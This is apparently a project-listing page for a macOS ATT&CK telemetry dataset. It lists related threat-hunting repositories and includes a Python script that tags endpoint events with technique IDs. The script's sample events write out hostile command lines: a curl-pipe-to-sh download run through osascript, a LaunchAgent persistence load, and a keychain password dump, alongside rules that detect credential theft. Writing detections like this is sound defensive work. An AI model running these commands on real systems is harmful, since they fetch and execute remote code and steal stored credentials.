sbousseaden / Macos Attack Dataset

JSON DataSet for macOS mapped to MITRE ATT&CK Tactics.

Projects that are alternatives of or similar to Macos Attack Dataset

ETWNetMonv3
ETWNetMonv3 is simple C# code for monitoring TCP network connections via ETW; ETWProcessMon/2 monitors process, thread, memory, image-load and TCP/IP activity via ETW and adds detection of remote-thread injection and in-memory payload detection based on VirtualMemAlloc events.
Stars: ✭ 32 (-72.41%)
Mutual labels:  detection, threat-hunting, blueteam
Pcap Attack
PCAP Samples for Different Post Exploitation Techniques
Stars: ✭ 175 (+50.86%)
Mutual labels:  detection, threat-hunting, mitre-attack
Sentinel Attack
Tools to rapidly deploy a threat hunting capability on Azure Sentinel that leverages Sysmon and MITRE ATT&CK
Stars: ✭ 676 (+482.76%)
Mutual labels:  detection, threat-hunting, mitre-attack
rhq
Recon Hunt Queries
Stars: ✭ 66 (-43.1%)
Mutual labels:  threat-hunting, mitre-attack
MindMaps
#ThreatHunting #DFIR #Malware #Detection Mind Maps
Stars: ✭ 224 (+93.1%)
Mutual labels:  detection, threat-hunting
S2AN
S2AN - Mapper of Sigma/Suricata Rules/Signatures ➡️ MITRE ATT&CK Navigator
Stars: ✭ 70 (-39.66%)
Mutual labels:  threat-hunting, mitre-attack
thremulation-station
Small-scale threat emulation and detection range built on Elastic and Atomic Redteam.
Stars: ✭ 28 (-75.86%)
Mutual labels:  threat-hunting, elastic
Attackdatamap
A data-source assessment at the event level that shows potential coverage of the MITRE ATT&CK framework
Stars: ✭ 264 (+127.59%)
Mutual labels:  threat-hunting, mitre-attack
ETWProcessMon2
ETWProcessMon2 monitors process, thread, memory, image-load and TCP/IP activity via ETW and adds detection of remote-thread injection and in-memory payload detection based on VirtualMemAlloc events.
Stars: ✭ 55 (-52.59%)
Mutual labels:  detection, blueteam
Auditd Attack
A Linux Auditd rule set mapped to MITRE's Attack Framework
Stars: ✭ 642 (+453.45%)
Mutual labels:  threat-hunting, mitre-attack
Threathunting
A Splunk app mapped to MITRE ATT&CK to guide your threat hunts
Stars: ✭ 738 (+536.21%)
Mutual labels:  threat-hunting, mitre-attack
SIGMA-detection-rules
Set of SIGMA rules (>250) mapped to MITRE ATT&CK tactics and techniques
Stars: ✭ 97 (-16.38%)
Mutual labels:  threat-hunting, mitre-attack
Bluespawn
An Active Defense and EDR software to empower Blue Teams
Stars: ✭ 737 (+535.34%)
Mutual labels:  threat-hunting, mitre-attack
Sysmon Modular
A repository of sysmon configuration modules
Stars: ✭ 1,229 (+959.48%)
Mutual labels:  threat-hunting, mitre-attack
BLUELAY
Searches online paste sites for certain search terms which can indicate a possible data breach.
Stars: ✭ 24 (-79.31%)
Mutual labels:  threat-hunting, blueteam
ELK-Hunting
Threat Hunting with ELK Workshop (InfoSecWorld 2017)
Stars: ✭ 58 (-50%)
Mutual labels:  threat-hunting, elastic
Helk
The Hunting ELK
Stars: ✭ 3,097 (+2569.83%)
Mutual labels:  elastic, threat-hunting
Malwless
Test Blue Team detections without running any attack.
Stars: ✭ 215 (+85.34%)
Mutual labels:  blueteam, mitre-attack
Threathunt
ThreatHunt is a PowerShell repository that allows you to train your threat hunting skills.
Stars: ✭ 92 (-20.69%)
Mutual labels:  threat-hunting, blueteam
Evtx Attack Samples
Windows Events Attack Samples
Stars: ✭ 1,243 (+971.55%)
Mutual labels:  threat-hunting, mitre-attack

macOS-ATTACK-DATASET

JSON dataset for macOS mapped to MITRE ATT&CK techniques and tactics, recorded using Elastic Endpoint Security for macOS.

N.B. for community contributions, any log collection method and format is acceptable (JSON preferred).
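Because the dataset is endpoint telemetry in JSON tagged with ATT&CK techniques and tactics, the natural consumer is a small hunting script that loads the records, reads the fields Elastic Endpoint emits (ECS names such as process.name and process.command_line) and tags process-start events with technique IDs. The block below is an added example and is not code from the dataset or its repository. It assumes one JSON object per line (NDJSON) and ECS field names; the sample events are constructed here, not taken from the dataset. The technique IDs (T1059.002 AppleScript, T1543.001 Launch Agent, T1555.001 Keychain) are real ATT&CK IDs. Two benign look-alikes are included so the rules show where the line is drawn: osascript without a "do shell script" escape, and a keychain query without -w, which lists metadata rather than printing the secret.

```python
"""Tag macOS endpoint events (ECS-style JSON) with ATT&CK technique IDs.

Added example; field layout and sample events are assumptions, not the
dataset's own files. Rules match on process.name plus command-line tokens.
"""
import json
from collections import defaultdict


def _proc(name, cmd, parent, ts, etype="start"):
    # Build one constructed ECS-style process event (the shape Elastic Endpoint uses).
    return {"@timestamp": ts,
            "event": {"category": ["process"], "type": [etype]},
            "host": {"os": {"type": "macos"}},
            "process": {"name": name, "command_line": cmd, "parent": {"name": parent}}}


# Constructed sample telemetry: three malicious-looking events and two benign ones.
SAMPLE_EVENTS = [
    _proc("osascript", "osascript -e 'do shell script \"curl -s http://198.51.100.7/p | sh\"'",
          "Terminal", "2021-05-01T10:00:00Z"),
    _proc("launchctl", "launchctl load -w /Users/bob/Library/LaunchAgents/com.apple.update.plist",
          "sh", "2021-05-01T10:00:05Z"),
    _proc("security", "security find-generic-password -ga bob -w",
          "sh", "2021-05-01T10:00:09Z"),
    _proc("osascript", "osascript -e 'display notification \"build done\"'",
          "Xcode", "2021-05-01T10:01:00Z"),          # benign: no shell escape
    _proc("security", "security find-generic-password -s wifi",
          "zsh", "2021-05-01T10:01:30Z"),            # benign: no -w, metadata only
]
SAMPLE_NDJSON = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS) + "\n"


def field(event, path, default=""):
    """Walk a dotted ECS path such as 'process.parent.name' through nested dicts."""
    cur = event
    for key in path.split("."):
        if not isinstance(cur, dict) or key not in cur:
            return default
        cur = cur[key]
    return cur


def _argv(event):
    # Whitespace split is enough for these rules; a real parser would honour quoting.
    return field(event, "process.command_line").split()


# (technique id, technique name, tactic, predicate over one event)
RULES = [
    ("T1059.002", "Command and Scripting Interpreter: AppleScript", "execution",
     lambda e: field(e, "process.name") == "osascript"
     and "do shell script" in field(e, "process.command_line")),
    ("T1543.001", "Create or Modify System Process: Launch Agent", "persistence",
     lambda e: field(e, "process.name") == "launchctl"
     and "load" in _argv(e)
     and "/Library/LaunchAgents/" in field(e, "process.command_line")),
    ("T1555.001", "Credentials from Password Stores: Keychain", "credential-access",
     lambda e: field(e, "process.name") == "security"
     and "find-generic-password" in _argv(e)
     and "-w" in _argv(e)),           # -w prints the secret itself
]


def load_events(ndjson_text):
    """Parse newline-delimited JSON, skipping blank lines and malformed records."""
    events = []
    for line in ndjson_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def classify(event):
    """Return [(technique_id, tactic)] for every rule that fires on a process-start event."""
    if "process" not in field(event, "event.category", []):
        return []
    if "start" not in field(event, "event.type", []):
        return []
    return [(tid, tactic) for tid, _, tactic, pred in RULES if pred(event)]


def hunt(ndjson_text):
    """Map tactic -> list of (technique_id, command_line) over a whole NDJSON file."""
    hits = defaultdict(list)
    for event in load_events(ndjson_text):
        for tid, tactic in classify(event):
            hits[tactic].append((tid, field(event, "process.command_line")))
    return dict(hits)


if __name__ == "__main__":
    for tactic, items in sorted(hunt(SAMPLE_NDJSON).items()):
        print(tactic)
        for tid, cmd in items:
            print(f"  {tid}  {cmd}")
```

To run it against a real dump, replace SAMPLE_NDJSON with the file contents; the rules only look at process.name and the command line, so anything that writes ECS-shaped process events will work, and the two benign events show that matching on the binary name alone would be far too noisy.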

License

macOS-ATTACK-DATASET's GNU General Public License